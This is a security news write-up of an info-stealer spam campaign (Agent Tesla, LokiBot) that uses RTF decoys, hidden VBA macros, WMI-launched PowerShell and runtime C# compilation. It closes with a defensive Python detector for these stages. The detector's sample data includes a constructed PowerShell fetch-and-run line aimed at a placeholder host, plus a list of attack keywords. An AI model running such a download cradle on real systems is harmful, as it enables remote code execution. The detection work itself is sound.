Obfuscation Marks

Agent Tesla and LokiBot are common payloads in the botnet-driven spam effort.
A large-scale spam campaign bent on spreading info-stealing malware is applying advanced obfuscation techniques to get around security scanning and maximize infection rates.
According to Lastline researchers, a large botnet is distributing malicious rich text format (RTF) documents that act as downloaders for well-known info-stealers such as Agent Tesla and LokiBot. Both families harvest credentials: FTP logins, saved email passwords, passwords stored in the browser and many others. Lastline said the effort is linked to another recent spam campaign identified by Cisco Talos.
The firm found that many of the targeted entities are within the education sector in the Asia-Pacific region; however, the campaign also seems to be using a second, “spray-and-pray” approach on other potential victims.
“Some email subjects were quite generic, which implies that attackers used the spam campaign to target the generic public,” according to an analysis published Thursday. In other cases, “email subjects were customized to specific targets or events, aiming to maximize its infection rate.”
The researchers found that the campaign uses common attack techniques, such as data obfuscation and VBA scripting, but that it also goes to great lengths to hide its infection processes.
Under the Hood
The campaign's malicious attachments are decoy RTF documents. When the user opens the attachment, a series of pop-ups repeatedly prompts the user to enable macros for an Excel spreadsheet.
That Excel spreadsheet is a “typical weaponized document with an embedded malicious VBA macro.” The macro itself is hidden via encoding with uncommon Unicode characters.
Once enabled, the macro reads hex-encoded content from one of the spreadsheet's cells. Decoded, that content is a PowerShell script, which the macro executes through Windows Management Instrumentation (WMI) rather than launching it directly, so the process is started by the WMI provider host instead of appearing as a child of Excel, the parent-child relationship endpoint tools most often key on.
The PowerShell script then compiles C# code at runtime with the C# compiler (csc.exe) from inside the script itself, which is another evasion technique.
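The following Python detector is an added example, not code from the Lastline report or from the campaign, covering the two stages described in the last two paragraphs: it hex-decodes spreadsheet cell contents and flags cells whose payload reads like PowerShell, and it scans Sysmon-style process-creation records for PowerShell started under WmiPrvSE.exe (the provider host that owns processes created through WMI) and for csc.exe spawned by PowerShell. The field names (Image, ParentImage, CommandLine), the keyword list and every sample cell and event below are constructed for this example and are not published indicators.

```python
"""Added example: detect a hex-encoded PowerShell stage hidden in spreadsheet
cells, and the WMI -> PowerShell -> csc.exe process chain. All sample data is
constructed for illustration; nothing here comes from the Lastline write-up."""
import re
from typing import Dict, List, Optional, Tuple

# Keywords that suggest a decoded blob is a PowerShell stage. This list is an
# assumption chosen for the example, not a vendor signature.
PS_INDICATORS = (
    "powershell", "iex", "invoke-expression", "new-object", "downloadstring",
    "add-type", "frombase64string", "-enc", "-nop", "hidden",
)


def decode_hex_cell(cell: str) -> Optional[bytes]:
    """Strip separators and hex-decode a cell. Returns None when the cell is
    not clean hex, e.g. a genuine spreadsheet value."""
    cleaned = re.sub(r"[\s,;:-]", "", cell)
    if len(cleaned) < 2 or len(cleaned) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", cleaned):
        return None
    return bytes.fromhex(cleaned)


def find_powershell_in_cells(cells: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (cell_ref, decoded_text) for cells whose hex payload contains at
    least two PowerShell indicators. Two hits avoids flagging a cell that
    merely decodes to a word such as 'hidden'."""
    hits = []
    for ref, value in cells.items():
        raw = decode_hex_cell(value)
        if raw is None:
            continue
        text = raw.decode("latin-1")  # every byte maps to a character, so no decode error
        low = text.lower()
        if sum(ind in low for ind in PS_INDICATORS) >= 2:
            hits.append((ref, text))
    return hits


def _base(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_process_events(events: List[dict]) -> List[Tuple[int, str]]:
    """Apply two rules to Sysmon-style process-creation records.
    Rule A: PowerShell whose parent is WmiPrvSE.exe. A process started via
      Win32_Process.Create runs under the WMI provider host, so the
      Excel -> powershell.exe link an analyst would expect is absent.
    Rule B: csc.exe spawned by PowerShell, i.e. C# compiled at run time
      (this is what Add-Type does under the hood)."""
    flagged = []
    for i, ev in enumerate(events):
        img, parent = _base(ev["Image"]), _base(ev["ParentImage"])
        if img in ("powershell.exe", "pwsh.exe") and parent == "wmiprvse.exe":
            flagged.append((i, "powershell launched via WMI"))
        if img == "csc.exe" and parent in ("powershell.exe", "pwsh.exe"):
            flagged.append((i, "csc.exe spawned by powershell (runtime C# compile)"))
    return flagged


# Constructed sample data: one hidden stage among ordinary cell values.
_PS_STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_CELLS = {"A1": "Q1 revenue", "B7": "1234", "Z99": _PS_STAGE.encode().hex()}

# Constructed sample events: Excel opens, WMI host starts PowerShell, which compiles C#.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "EXCEL.EXE"},
    {"Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "WmiPrvSE.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"csc.exe /noconfig /fullpaths @C:\Users\u\AppData\Local\Temp\x.cmdline"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for ref, text in find_powershell_in_cells(SAMPLE_CELLS):
        print(f"cell {ref}: {text}")
    for idx, why in flag_process_events(SAMPLE_EVENTS):
        print(f"event {idx}: {why} ({SAMPLE_EVENTS[idx]['CommandLine']})")
```

Rule A is the one worth keeping in mind when hunting this campaign: a simple "Office spawned PowerShell" rule will not fire, because WMI makes WmiPrvSE.exe the parent. Pair the process rules with the cell decoder run over extracted spreadsheet contents, and extend the indicator list to whatever your environment considers abnormal.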